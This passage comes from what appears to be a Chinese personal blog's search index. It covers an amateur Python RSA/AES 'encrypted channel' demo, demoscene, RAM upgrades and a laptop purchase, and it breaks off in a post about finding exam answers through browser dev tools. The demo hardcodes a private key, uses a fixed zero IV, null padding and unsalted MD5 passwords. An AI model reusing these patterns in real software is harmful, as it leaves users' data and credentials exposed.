现在不过是权宜之计，以后还是得想办法把整个论坛下载到本地，至少能搞个数据库的差异备份啥的也行啊……" },{ "title": "加密传输Demo V2", "category": "", "tags": "加密, Demo", "url": "/2020/06/13/encrypt.html", "date": "2020/06/13", "content": "太业余总感觉不太好啊前言在上个月我写了一个加密传输的Demo，相当的业余，这个东西只能做到从客户端向服务端的单向传输，而且因为只有一次请求，所以中间人攻击也非常的容易。   虽然我觉得那个应该足够我完成作业了，但是我想了想，太业余总显得我很菜 （难道不是吗？） ，所以我打算还是努力一下把完整的握手也做出来吧。实现思路和上次差不多，同样我打算通过RSA加密一个随机数作为AES的密钥，但是和上次不同，这次的这个密钥将在通信建立之后密钥就不再变化，传入传出都是这个密钥。   之前觉得握手阶段可能很麻烦，不过我画了一下图稍微理了理思路发现其实也没多复杂，也就是客户端生成密钥然后加密传输过来让服务端保存，完成之后之间的传输只要传被加密的数据就行了。这样我觉得应该也能起到一定的防止中间人攻击的作用吧……     不过我只用了一个文件作为传输的管道，为了避免冲突，我在每次写入数据的时候也都标明了数据的来源，这样就不会因为自己刚发完然后自己又重新接收自己发的东西了。   另外老师希望我的Demo有个简单的应用，所以我又另外加了一个极其简单的登录系统在里面，这样我就不用手动操作服务端了。代码server.py# -*- coding: utf-8 -*-print(\"加密通道服务端演示开始\")from Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from Crypto.Cipher import AES  import base64import hashlibimport jsonimport timeprivate_key = \"\"\"-----BEGIN RSA PRIVATE KEY-----MIICXQIBAAKBgQDfEQ82qUrto7h4BL3TsA/DFXSdM44cbeY4kPccD7gLGhaZRClzYKIh5zYdfjBGF+0HXfMa1u9b7GNs2AjVIsx8Kx0QLnMfmtkmGWGhOXz/9IDLKJOx0weKv61gysKItgzVKn2mbLool4R/PQBc3AjDyHw+io1KpVz+3kRTaGs1fQIDAQABAoGAWB4kFWLA/6k6OOcemd4mC9mQ7HyuOdrMJDJX+5TWDkSrArajbTmSMrRkczgjF71h3BQn8cVQXs695ARfUNrjTbi2Y0LjN7ScK7ExzTLdoMEFw5JsHggJZ0zBQY6wmwOdGfqzA6tZPXgkn+jqEha+CD6GrwnTM1oDGJC/aKG2OmECQQDkO9IhUhFc/PSU0zvGE6AOcqk5wlOuvMg+oAFHJHJZ9XW7+X/Nx0ZoVDFq/cZQj+46t+fiwUwhdW7lIfCvNGKFAkEA+jRQmWGKrbf1ns4S0SezJvysd5O6otRGJXr+Ex2uDhc39ZTeUsygkjrLhp8STLMOmql+8g5fghct17EuCX1EmQJBAJz9BNnEkIrst/OSpH/nyeWGOx6uq077LaXd+2MLD9kO/O/Se3V5B9YFa4STkJCjoBMloswXd51gIGpdgSeSmd0CQQCLPrwwcGmWfo+ynqs4PajlpK9zKQMwhYS4bTejedwZOXDKOtx0Ji+i0hfcxwCPMQOKrZPZsIgUxUOdC508aLvZAkBDkHxunCzDm0w4DdTUN7S9YSpVvQEjK/xUQiWaKV128QgskhU2DNdYK2NxifnWrKtx3uQmqMxX5aLuJZ4493yr-----END RSA PRIVATE KEY-----\"\"\"# 公钥解密def rsa_decode(cipher_text, private_key):    rsakey = RSA.importKey(private_key)  # 导入读取到的私钥    cipher = PKCS1_v1_5.new(rsakey)  # 生成对象    # 将密文解密成明文，返回的是一个bytes类型数据，需要自己转换成str    text = cipher.decrypt(base64.b64decode(cipher_text), \"ERROR\")    return text.decode()    class PrpCrypt(object):     def __init__(self, key):        self.key = key.encode('utf-8')        self.mode = AES.MODE_CBC            def encrypt(self, text):        text = text.encode('utf-8')        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        # 这里密钥key 长度必须为16（AES-128）,        # 24（AES-192）,或者32 （AES-256）Bytes 长度        # 目前AES-128 足够目前使用        length = 16        count = len(text)        if count < length:            add = (length - count)            # \\0 backspace            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        elif count > length:            add = (length - (count % length))            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        self.ciphertext = cryptor.encrypt(text)        # 因为AES加密时候得到的字符串不一定是ascii字符集的，输出到终端或者保存时候可能存在问题        # 所以这里统一把加密后的字符串转化为16进制字符串        return base64.b64encode(self.ciphertext)     # 解密后，去掉补足的空格用strip() 去掉    def decrypt(self, text):        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        plain_text = cryptor.decrypt(base64.b64decode(text))        # return plain_text.rstrip('\\0')        return bytes.decode(plain_text).rstrip('\\0')#初始化pipefile = open('pipe.txt','w')print(\"\",file = file)file.close()#协商密钥while True:    pipe = open(\"pipe.txt\", mode='r')    data = pipe.read()    if not data == \"\\n\":        data = json.loads(data)        pipe.close()        break    pipe.close()    time.sleep(1)file = open('pipe.txt','w')print(\"\",file = file)file.close()key = rsa_decode(data[\"key\"], private_key)akey = PrpCrypt(key)print(\"成功获取密钥\",key)print(\"已建立连接\")userInfo={\"Name\":\"Mayx\",\"Passwd\":'25d55ad283aa400af464c76d713c07ad',\"Book\":\"《会说话就多说点》，《在哪里能买到您的著作》\"}#处理阶段#Waiting for Questwhile True:    pipe = open(\"pipe.txt\", mode='r')    data = pipe.read()    if not data == \"\\n\":        data = json.loads(data)        if data[\"from\"] == \"Client\":            pipe.close()            break    pipe.close()    time.sleep(1)print(\"已收到请求\")data = json.loads(akey.decrypt(data[\"data\"]))if data[\"name\"] == userInfo[\"Name\"] and data[\"pwd\"] == userInfo[\"Passwd\"]:    file = open('pipe.txt','w')    print(json.dumps({\"from\":\"Server\",\"data\":akey.encrypt(\"登录成功，您的书单如下：\"+userInfo[\"Book\"]).decode(\"utf-8\")}),file = file)    file.close()else:    file = open('pipe.txt','w')    print(json.dumps({\"from\":\"Server\",\"data\":akey.encrypt(\"登录失败\").decode(\"utf-8\")}),file = file)    file.close()print(\"请求已回应\")print(\"加密通道服务端演示结束\")client.py# -*- coding: utf-8 -*-print(\"加密通道客户端演示开始\")import randomfrom Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from Crypto.Cipher import AES  import base64import hashlibimport jsonimport timepublic_key = \"\"\"-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDfEQ82qUrto7h4BL3TsA/DFXSdM44cbeY4kPccD7gLGhaZRClzYKIh5zYdfjBGF+0HXfMa1u9b7GNs2AjVIsx8Kx0QLnMfmtkmGWGhOXz/9IDLKJOx0weKv61gysKItgzVKn2mbLool4R/PQBc3AjDyHw+io1KpVz+3kRTaGs1fQIDAQAB-----END PUBLIC KEY-----\"\"\"# 公钥加密def rsa_encode(message, public_key):    rsakey = RSA.importKey(public_key)  # 导入读取到的公钥    cipher = PKCS1_v1_5.new(rsakey)  # 生成对象    # 通过生成的对象加密message明文，注意，在python3中加密的数据必须是bytes类型的数据，不能是str类型的数据    cipher_text = base64.b64encode(cipher.encrypt(message.encode(encoding=\"utf-8\")))    # 公钥每次加密的结果不一样跟对数据的padding（填充）有关    return cipher_text.decode()class PrpCrypt(object):     def __init__(self, key):        self.key = key.encode('utf-8')        self.mode = AES.MODE_CBC     # 加密函数，如果text不足16位就用空格补足为16位，    # 如果大于16当时不是16的倍数，那就补足为16的倍数。    def encrypt(self, text):        text = text.encode('utf-8')        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        # 这里密钥key 长度必须为16（AES-128）,        # 24（AES-192）,或者32 （AES-256）Bytes 长度        # 目前AES-128 足够目前使用        length = 16        count = len(text)        if count < length:            add = (length - count)            # \\0 backspace            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        elif count > length:            add = (length - (count % length))            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        self.ciphertext = cryptor.encrypt(text)        # 因为AES加密时候得到的字符串不一定是ascii字符集的，输出到终端或者保存时候可能存在问题        # 所以这里统一把加密后的字符串转化为16进制字符串        return base64.b64encode(self.ciphertext)                # 解密后，去掉补足的空格用strip() 去掉    def decrypt(self, text):        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        plain_text = cryptor.decrypt(base64.b64decode(text))        # return plain_text.rstrip('\\0')        return bytes.decode(plain_text).rstrip('\\0')#初始化阶段while True:    try:        pipe = open(\"pipe.txt\", mode='r')    except:        time.sleep(1)    else:        breakpipe.close()#协商密钥key = str(random.randint(1000000000000000,9999999999999999))akey = PrpCrypt(key)cipher = rsa_encode(key, public_key)data = json.dumps({\"key\":cipher})file = open('pipe.txt','w')print(data,file = file)file.close()while True:    pipe = open(\"pipe.txt\", mode='r')    if pipe.read() == \"\\n\":        pipe.close()        break    pipe.close()    time.sleep(1)print(\"成功发送密钥\",key)print(\"已建立连接\")#处理阶段#Single Questname = input(\"请输入用户名：\")pwd = input(\"请输入密码：\")hash = hashlib.md5(pwd.encode(encoding='UTF-8')).hexdigest()data = json.dumps({\"from\":\"Client\",\"data\":akey.encrypt(json.dumps({\"name\":name,\"pwd\":hash})).decode(\"utf-8\")})file = open('pipe.txt','w')print(data,file = file)file.close()print(\"已发出，等待回应\")while True:    pipe = open(\"pipe.txt\", mode='r')    data = pipe.read()    if not data == \"\\n\":        data = json.loads(data)        if data[\"from\"] == \"Server\":            pipe.close()            break    pipe.close()    time.sleep(1)print(\"已收到回应\")data = akey.decrypt(data[\"data\"])print(data)print(\"加密通道客户端演示结束\")后记关于SSL/TLS的具体内容我也没有好好看一遍，我打算回头有时间仔细看一看，然后再回来看这个代码是有多么的糟糕🤪。" },{ "title": "关于Demoscene的探索", "category": "", "tags": "Demoscene", "url": "/2020/06/06/demoscene.html", "date": "2020/06/06", "content": "大佬们的领域我们无法步入……前言最近闲来无事又在回顾自己的历史，真是呜呼哀哉……14年左右的我是那么的有探索和研究精神，怎么过了几年之后就成Five了呢……   在我过去留下的文件里，我找到了一些比较有意思的东西，比如当时网上传的很火的一个叫做.the .product的一个64KiB的动画，传说它用了外星压缩算法把1个多GiB的东西压缩成了64KiB，真是令人感到不可思议，还有一个叫做kkrieger的3D游戏，同样也仅仅用了92KiB。   这两个作品都来自一个叫做Farbrausch的组织，可能是这个组织的宣传做的比较好，其他的Demoscene虽然做的也很不错，但是并不怎么知名，唯有这个组织的Demoscene在网上广为流传……（不过也许是因为Breakpoint的Party知名度比较高）   除此之外，在Windows XP时代喜欢玩批处理的人也一定知道一个叫做OMNISCENT的动画，把一串乱七八糟的东西放到debug程序里得出的一个只有4KiB的小程序，就能播放出一个看起来好像在一个飞船里的一个3D动画。  以上所说的这些我当时不知道是什么东西。到了现在，我才知道这些是一种叫做Demoscene的东西。什么是DemosceneDemoscene根据百科所说是一种计算机艺术亚文化，中文名叫做演景。玩这个的人就喜欢用计算机来渲染出一些看起来很有感觉的带音频的视频。因为这些画面都是直接渲染出来的，所以占用的空间也非常的小。   这个道理就和位图和矢量图、波形音乐和MIDI音乐一样，程序总比数据占用的空间小，所以Demoscene通常来说都是用很小的程序来表现很复杂的场面。不过做过像svg的人应该也知道，同一个图像，做矢量图的难度要比制作位图的难度要大，这也就是为什么Demoscene是只有大佬才会玩的东西。   虽然说这个东西说是计算机文化，但是在我看来这个东西就是会写程序的数学家搞的玩意，这就和NOI一样荒谬，一堆数学题非得要叫个信息学比赛……Demoscene的实现方式过去的Demoscene通常都是使用汇编写出来的，虽然说汇编写出来的程序应该很小，但是它因为过于复杂以至于有些硬件资源它无法很好的利用。   因为Demoscene主要表现的是音乐和视频，那么这些事让显卡做的效率自然要比用CPU做的效率高很多。比如说我上面所说的OMNISCENT，这个程序完全使用的是CPU的计算资源，虽然使用了4KiB，看起来很小，但是事实上还是浪费了不少的空间。最近我在逛scene.org的时候见到了一个更加厉害的Demoscene，名字叫做elevated。它用了4KiB表现了一座山的春夏秋冬，不仅画面更加精致，而且时长也更长。   我看了一下，他们还放出了源代码，看起来是使用C++和汇编写出来的，使用了微软的DirectX9来调用显卡。再看其他代码，好多东西就只用了一句话来表示，比如太阳就只需要一句\"+pow(saturate(mul(e,q[3])),16)*float3(.4,.3,.1)\"，云也只有一句\"+.1*f(s+q[3].w*.2,10)\"。这样看来难怪整个程序那么小，一个公式就表示了一个模型，这群伪装成程序员的数学家也真是有够强。   除此之外也有一些用数学界常有的复杂3D模型生成公式的，比如什么Romanesco Broccoli，还有分形之类乱七八糟的东西，像这些就超出我的理解范围了 （连线代都搞不懂还搞这个？）。后记既然Demoscene对数学的要求如此之高，对我来说自然是无缘步入了。但是欣赏他们的作品还是挺不错的。   除了上述的一些Demo(Intro)外，我还找到了一些比较有意思的，比如今年一个叫做Revision的Party里就有一个叫做SyncCord的作品，同样是4KiB，效果也是非常的不错。   当然也不一定非要局限于4KiB还是64KiB，更大的有更多的表现空间，就比如07年的一个叫做debris的作品，堪称大片，大小也仅仅只有177KiB，另外这也是Farbrausch的作品。   更多的作品大家可以自己去scene.org找，这里面有历年各位神仙做的各种各样的Demoscene。   另外除了这些程序之外，也还有一些大佬拿JS写的只有1KiB的网页，大家可以在js1k.com里找到，当然这些和那些写真正程序的人完全不能比，只是觉得1KiB的JS能做出那些东西也感觉很有意思。" },{ "title": "写一个加密传输的Demo", "category": "", "tags": "加密, Demo", "url": "/2020/05/29/encrypt.html", "date": "2020/05/29", "content": "非专业密码学，仅供娱乐！起因最近我们学校搞了一个工程项目，要求是研究关于信息安全等级保护的一些东西，一开始我以为这就是搞个权限啥的，后来发现和云计算一样是个定义，话说我明明是网络工程专业的为啥还要了解信息安全……   当然这个什么等级保护的内容很多，我们不可能全都涉及，所以老师允许我们只选其中的一部分进行研究。我想了想，我之前还想搞什么加密邮件啥的，所以我选了通信安全方面的板块，这样也可以对那个项目有些参考。实现思路我本来是想按着TLS的标准来写，后来看了看发现那样不太方便，我写Demo也就是玩玩而已，不用费那么大劲。   像正常来说，建立加密通道是要有握手环节的，但是那个实现起来实在是太麻烦，所以想了想就算了。    所以我的实现方式是生成一个随机数，用AES以随机数为密码加密数据，用RSA加密随机数。这样做的主要目的是利用RSA的特性保证传输内容不会被泄露，但是RSA相对来说太慢，所以用了AES来加密数据，这样就能提高传输的效率。   传送方式我之前还想着要不要建一个TCP Socket或者是Unix Domain Socket来传输，但是后来觉得这样太麻烦，不如直接用文件的方式传，这样还简单好理解。 （就是嫌麻烦嘛）   另外在通信安全中还有一点是要求校验数据，我想了想就用MD5吧，正常来说得到MD5后还要数字签名啥的，我觉得麻烦也就没搞，所以最终传输的内容就是AES加密后的数据、原数据的MD5(Hash)以及用RSA加密的密钥。   虽然我学Python的时间不长，不过我现在发现Python在做这些事情的时候远比Shell、PHP和JS简单，所以这次的Demo也是用Python实现的。   不过我的Python并不怎么样，所以大多数代码都是从网上Copy的，像Crypto的库我不搜一下肯定是不会用嘛。   既然用到了Crypto库，那么如果有人有兴趣执行下面的代码，自然需要执行一下pip3 install pycryptodome才可以正常运行啦。代码server.py# -*- coding: utf-8 -*-from Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from Crypto.Cipher import AES  import base64import hashlibimport jsonprivate_key = \"\"\"-----BEGIN RSA PRIVATE KEY-----MIICXQIBAAKBgQDfEQ82qUrto7h4BL3TsA/DFXSdM44cbeY4kPccD7gLGhaZRClzYKIh5zYdfjBGF+0HXfMa1u9b7GNs2AjVIsx8Kx0QLnMfmtkmGWGhOXz/9IDLKJOx0weKv61gysKItgzVKn2mbLool4R/PQBc3AjDyHw+io1KpVz+3kRTaGs1fQIDAQABAoGAWB4kFWLA/6k6OOcemd4mC9mQ7HyuOdrMJDJX+5TWDkSrArajbTmSMrRkczgjF71h3BQn8cVQXs695ARfUNrjTbi2Y0LjN7ScK7ExzTLdoMEFw5JsHggJZ0zBQY6wmwOdGfqzA6tZPXgkn+jqEha+CD6GrwnTM1oDGJC/aKG2OmECQQDkO9IhUhFc/PSU0zvGE6AOcqk5wlOuvMg+oAFHJHJZ9XW7+X/Nx0ZoVDFq/cZQj+46t+fiwUwhdW7lIfCvNGKFAkEA+jRQmWGKrbf1ns4S0SezJvysd5O6otRGJXr+Ex2uDhc39ZTeUsygkjrLhp8STLMOmql+8g5fghct17EuCX1EmQJBAJz9BNnEkIrst/OSpH/nyeWGOx6uq077LaXd+2MLD9kO/O/Se3V5B9YFa4STkJCjoBMloswXd51gIGpdgSeSmd0CQQCLPrwwcGmWfo+ynqs4PajlpK9zKQMwhYS4bTejedwZOXDKOtx0Ji+i0hfcxwCPMQOKrZPZsIgUxUOdC508aLvZAkBDkHxunCzDm0w4DdTUN7S9YSpVvQEjK/xUQiWaKV128QgskhU2DNdYK2NxifnWrKtx3uQmqMxX5aLuJZ4493yr-----END RSA PRIVATE KEY-----\"\"\"# 公钥解密def rsa_decode(cipher_text, private_key):    rsakey = RSA.importKey(private_key)  # 导入读取到的私钥    cipher = PKCS1_v1_5.new(rsakey)  # 生成对象    # 将密文解密成明文，返回的是一个bytes类型数据，需要自己转换成str    text = cipher.decrypt(base64.b64decode(cipher_text), \"ERROR\")    return text.decode()    class PrpCrypt(object):     def __init__(self, key):        self.key = key.encode('utf-8')        self.mode = AES.MODE_CBC     # 解密后，去掉补足的空格用strip() 去掉    def decrypt(self, text):        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        plain_text = cryptor.decrypt(base64.b64decode(text))        # return plain_text.rstrip('\\0')        return bytes.decode(plain_text).rstrip('\\0')while not input(\"按回车读取客户端的信息，输入其他内容结束\"):    cipher = open(\"pipe.txt\", mode='r')    msg = json.loads(cipher.read())    cipher.close()    key = rsa_decode(msg[\"key\"], private_key)    aesc = PrpCrypt(key)    message = aesc.decrypt(msg[\"message\"])    hash = hashlib.md5(message.encode(encoding='UTF-8')).hexdigest()    if hash == msg[\"hash\"]:        print(\"数据校验成功\")    else:        print(\"数据校验失败\")    print(message)client.py# -*- coding: utf-8 -*-import randomfrom Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from Crypto.Cipher import AES  import base64import hashlibimport jsonpublic_key = \"\"\"-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDfEQ82qUrto7h4BL3TsA/DFXSdM44cbeY4kPccD7gLGhaZRClzYKIh5zYdfjBGF+0HXfMa1u9b7GNs2AjVIsx8Kx0QLnMfmtkmGWGhOXz/9IDLKJOx0weKv61gysKItgzVKn2mbLool4R/PQBc3AjDyHw+io1KpVz+3kRTaGs1fQIDAQAB-----END PUBLIC KEY-----\"\"\"# 公钥加密def rsa_encode(message, public_key):    rsakey = RSA.importKey(public_key)  # 导入读取到的公钥    cipher = PKCS1_v1_5.new(rsakey)  # 生成对象    # 通过生成的对象加密message明文，注意，在python3中加密的数据必须是bytes类型的数据，不能是str类型的数据    cipher_text = base64.b64encode(cipher.encrypt(message.encode(encoding=\"utf-8\")))    # 公钥每次加密的结果不一样跟对数据的padding（填充）有关    return cipher_text.decode()class PrpCrypt(object):     def __init__(self, key):        self.key = key.encode('utf-8')        self.mode = AES.MODE_CBC     # 加密函数，如果text不足16位就用空格补足为16位，    # 如果大于16当时不是16的倍数，那就补足为16的倍数。    def encrypt(self, text):        text = text.encode('utf-8')        cryptor = AES.new(self.key, self.mode, b'0000000000000000')        # 这里密钥key 长度必须为16（AES-128）,        # 24（AES-192）,或者32 （AES-256）Bytes 长度        # 目前AES-128 足够目前使用        length = 16        count = len(text)        if count < length:            add = (length - count)            # \\0 backspace            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        elif count > length:            add = (length - (count % length))            # text = text + ('\\0' * add)            text = text + ('\\0' * add).encode('utf-8')        self.ciphertext = cryptor.encrypt(text)        # 因为AES加密时候得到的字符串不一定是ascii字符集的，输出到终端或者保存时候可能存在问题        # 所以这里统一把加密后的字符串转化为16进制字符串        return base64.b64encode(self.ciphertext)    message=\" \"while message:    message = input(\"请输入需要传输的信息（不输入则结束）：\")    hash = hashlib.md5(message.encode(encoding='UTF-8')).hexdigest()    key = str(random.randint(1000000000000000,9999999999999999))    cipher = rsa_encode(key, public_key)    aesc = PrpCrypt(key)    data=json.dumps({\"message\":aesc.encrypt(message).decode('utf8'),\"hash\":hash,\"key\":cipher})    print(data,file = open('pipe.txt','w'))    print(\"数据已发出！\")感想我在写这个代码的时候在网上搜到的资料也真的是算少了，就像我当时打算写加密邮件那时一样，基本上大多数的资料都有问题，像有些代码还是Python2的，还有时候经常遇到什么bytearray、json转换之类乱七八糟的问题。   希望中文网络环境能多一些大家遇到的冷门知识的解决方法啊……    对了，这个代码实际上只有防止中间人窥探信息的能力，并没有防篡改的能力，毕竟没有两端握手，没法做验证，所以这就是一个业余的加密传输代码，仅供参考。" },{ "title": "Re:加装内存", "category": "", "tags": "内存", "url": "/2020/05/20/memory.html", "date": "2020/05/20", "content": "论头铁是什么感受头铁的开端在去年的8月份我给我的旧笔记本加装了一次内存条，结果……很悲惨，把电脑的充电功能搞坏了。   几个月后的今天，我不记过去的痛苦，头铁的为我的新笔记本电脑加装了一次内存条……   本来我是打算用几年以后直接加32GiB的内存，但是最近装了个虚拟机，发现8GiB的内存不怎么够用，Windows自己就占用了一半的内存，结果我用Ubuntu虚拟机开动态内存需求是5GiB的内存。虽然心里很难受，但是想了想还是加吧，花钱让人难受，但是花钱也是为了让人不难受啊……   不过现在问题不在花钱，在于自己手残，但是又不想请人来装。虽然上一篇文章我还在说自己花同样钱或精力做不到的事情就让别人来做，不过那就是个垃圾文章，我肯定是头坏了才会写出那种垃圾文章。现在我已经知道了，合不合理不在于省钱，而是脑子正不正常。   不过我想了想，之前的笔记本之所以装坏了是因为它是商务本，内存条在C面，要装得把主板拆下来所以才搞出了问题。新电脑是游戏本，不用拆掉主板也能加内存，也许成功率会高一些吧……坎坷的装内存之旅我上周就已经打算装，已经在网上下单买内存了，但是发生了很糟糕的事情，店家给我发错了货，我买的是3200MHz频率的内存条，结果他们发成了2666MHz的……当然这个东西我直接看内存条其实是不会看的，不装到电脑上我也不知道。   内存拿到手之后，我打算速战速决，后盖打开、电池拔掉、内存插上、电池插上，然后就直接装后盖了，真不知道该说是头铁还是智障，测试都没测试，觉得速战速决就能让电脑不坏吗？现实是残酷的，螺丝都拧好了然后按开机键没反应……没办法，我只能把后盖再拆开，然后重新试。   既然电脑已经拆了一回了就感觉什么东西破碎了，第二次装的时候我就不再装后盖就直接开机，电脑重启了三回，第一回屏幕没反应，第二回只有Logo，第三回可算是开始引导系统，结果BitLocker的界面出来了，貌似是因为电池拔掉后BIOS重置，安全启动自动关闭，然后TPM就不认了。   这……算了，反正前几周我还升过BIOS固件也遇到过相同的情况。不过这也太不安全了吧，BIOS居然没有自带的电池？我的BIOS密码也因此消失不见了，那这个东西密码还有什么用，后盖那么好拆，电池一拔密码就没了……   我把安全启动的证书恢复了出厂设置，系统总算是正常启动了，看着16GiB的内存心里还是挺高兴的。这时候再看一眼频率，2666MHz？我怀疑是不是我装的有问题，这时候我打开命令提示符，输入wmic memorychip，一看两个内存的频率确实不一样，我感觉被坑了……这也许就是运气问题，合理不合理消费都是小事，运气不好咋也省不了钱。   还好店家倒也不是那种不讲理的人，给我换了一条3200MHz的，今天重新装上，这也算是告一段落了。心得加内存条倒也没啥心得，就是注意一下拔电池，内存斜着插进去就行了。唯一让我难受的就是我买东西真的是艰难，本来想在更好的电脑上加内存，结果好电脑没买上，买了个垃圾一点的还是忍不住加内存，结果一买还发错货了，不仅如此，换回来之后再一查其他家同款的降了10CNY……   生活真是艰难啊……糟糕的事情一出接着一出……" },{ "title": "合理消费", "category": "", "tags": "演讲稿, 消费", "url": "/2020/05/07/consume.html", "date": "2020/05/07", "content": "利己，就是合理。起因由于我们语文老师想让我们做一次演讲，然后正好我也受到家人说我总在吃的东西花钱多的启发，所以我打算趁此机会再水一篇文章。   当然我至少是有演讲经验的，而且这次演讲才5分钟，和上次40分钟的演讲完全不能比，另外这次也不需要对着人讲，只需要对着电脑讲就行了，所以相比来说应该会轻松一些。我认为的合理消费什么是合理消费？那么首先就要给合理下一个定义。对于一般人来说，自己认为正确的对于自己来说就是合理的，不过这种合理在实际生活中可能会让自己陷入困境。对于我来说，我认为的合理肯定就是我认为正确的，虽然我也说过如果只是想当然会出问题，但是一般来说我肯定是不希望自己陷入困境的，如果真的出现了这样的事情我肯定会改正，所以我认为的就是合理的。说这么多只为一点，那就是我说的就是正确的，不接受杠精的反驳！23333    那么接下来就让我谈一谈我的消费观念吧！  合理消费以省钱为主   虽然先前投资很重要，但是我总感觉自己很非，像抽卡总是抽不到好的，买电脑也买不到称心如意的QAQ……生活真是太艰难了……不过即使如此我们也要坚持下去。所以既然我我们知道投机取巧是不现实的，那么就少在投机的事情上花钱吧，当然也不是不能投机，觉得保本的可能性大的话就去玩一玩吧。  不为虚拟的东西花一分钱   像我在虚拟的东西上基本上可以说是一分钱都没有花，像往游戏里充钱啥的根本不可能，软件也是。虽然我以后说不定也靠创作虚拟产品来搜刮用户的钱，但是对我来说我就是不愿意为此花钱。   另外在现实中对于周边我同样是一分钱也不愿意花，虽然我也喜欢ACGN次文化比较喜欢，但是我就是不愿意为此花钱，因为为它们花钱就是买了虚拟的图案加上质量一般的产品，很不值得。当然如果有人给我送的话我是很开心的，我只是不愿意买罢了。（别说了，都是穷😂）  自己花同样钱或精力做不到的事情就让别人来做   我们为什么要花钱，我仔细想了想，其实就是为了完成我们做不到的事情，比如有些人是电脑小白，不会装系统，就需要花20CNY来请别人来装。有人说他们被坑了，但是我不这么认为，他们花50CNY也不一定能做来的事情花20CNY做不是很赚吗？像我为什么愿意为吃的花钱？就是因为我花100CNY也做不出来我想吃的东西，但是我想吃的东西10CNY就能买来，这时候就不要节约自己的钱了，大胆的为自己的目标花钱吧！其他更多的观点5分钟内也讲不完了，那么以上就是我对合理消费的一些拙见，Thanks for watching!后记虽然这是个演讲，不过我说的也都是认真的哦，在现实中我就是按这样的标准来做的。   当然如果有人觉得有不合理的问题也可以说，但是如果有人用像“正大光明使用盗版”这种道德绑架的方式来喷我的话，那我建议最好按下Ctrl+w，就当没看过这篇文章。（根本没人来看啊😂）" },{ "title": "记一次买笔电的经历", "category": "", "tags": "笔记本电脑, 经历", "url": "/2020/04/21/laptop.html", "date": "2020/04/21", "content": "买个电脑真是太难了QAQ……起因在去年，我曾说过，以后如果有出了7nm制程、Zen2架构的AMD移动端CPU的电脑，我就买一台。结果今年年初AMD公司就出了。不过当时我听说当时出的时候好像是联想的电脑装的，名字好像叫Yoga Slim 7，可惜我等了好久也没见它开卖。正好这时我偶然看到了华硕天选也出了符合我要求的电脑，而且还有蓝色的外壳， 再加上看起来很像Kiana的天选姬23333， 这看起来都很吸引我，于是我就决定买这款电脑了。糟糕的购买经历当时我在这款电脑预售的第二天就知道了它的存在，思考了几天我决定买下它。当时这个电脑似乎只有在京东上可以买，但是由于某些原因我在淘宝上也看了看，结果淘宝上也有，能加内存条还不用抢，价格一样而且还比京东上多了一堆赠品。我想了想，新电脑有那么高级的配置应该多加一条内存，但是我手残，自己装内存条还把笔记本装坏了……再加上一堆加成，我就被这个淘宝店吸引了。   正是因为如此，所以我没有在第一次发售去抢，结果第一次发售结束后店家还没有发货，我试着抢第二次发售的货，结果由于第一批货口碑不错，第二批根本抢不到，再往后就开始涨价了……然而淘宝店的店家仍然没有发货……据他们说，厂家不给他们货了。   当然，这个店家拖这么久我是可以让他们给我赔钱的，但是我不希望赔钱，我想要电脑啊……直到前几天华硕又一次发售，这次他们在这个产品上加了一个低端版的电脑，没办法，店家好像有低端版本的，所以我就让他们给我换了一下。   换了低端版之后给我退了1K的差价，从原来6799的有着RTX2060显卡和16GiB内存的电脑妥协成了现在5799的只有GTX1650ti的垃圾显卡和8GiB的内存，配置一下降了一半，但是价格才退1000……而且还等了这么久QAQ……真的是太难了。使用体验今天电脑到手了，还好是真的电脑，没给我寄一块砖头😂，打开看了一下也没什么太大的问题，于是我就开始把电脑原来家庭版的系统换成了专业版，我之所以换的主要原因是为了用BitLocker、Windows沙箱和Hyper-V。   整个调试好之后我发现这个电脑还是有不少问题的，比如在电脑没有打游戏的时候屏幕会闪，大概是核心显卡或者是驱动的问题？另外这个电脑在有一些运算的时候声音是真的大，真的和开直升机一样。不过平时上个网，打个字倒还是挺安静的，感觉风扇一点也没转，我现在写博客就用的是这台电脑。对这台电脑的期望不过既然这个电脑还不到6000，我觉得还是不追究这些问题了，至少这还是华硕的电脑，如果真的出了问题也有售后。现在我就希望未来5年内它能好好的为我工作，不要比过了20年都还能正常开机的电脑差就好了。" },{ "title": "关于制作考试（答题）系统的研究", "category": "", "tags": "考试, 答题", "url": "/2020/04/19/exam.html", "date": "2020/04/19", "content": "在答题系统的安全性上，没有人胜利……答题系统的来由在我维护的花火学园上，有一套答题系统。另外我能成为花火学园的运维也是因为这个系统，这件事也是个很神奇的事情。   具体内容也充满了机遇性，在我上高中的一天，我偶然发现了花火学园论坛，发现了之后我就想注册，然而这个论坛注册要求挺高，需要邀请码，如果没有就要去答20道题来获得邀请码。   那个题很难，正常人会的可能只有不到一半，如果有兴趣也可以看看花火考场，对于这些题同样我也不会。不过不会没关系，我以前在做网上的考试时，从来都不会安心看题，总会想着按下F12看看有没有什么不答题也能通过的方法。   按正常来说，应该没有人会把答案放到网页源代码中，但是在我做的好多次网络考试中，他们都把答案放到了源代码之中。我想这也许是为了降低服务器的运算压力吧……但是这样考试有点计算机知识的人都能把答案找出来，那考试还有啥意义……   总之就是因为这样奇怪的程序员很多，所以我每次在网上答题前都会按下F12看看有没有什么更简单的通过方法。   当时我看了看花火考场的源代码，是打包后的vue代码，看来是没法从网页源代码这里入手了，那第二点就是查看网络请求的数据了。   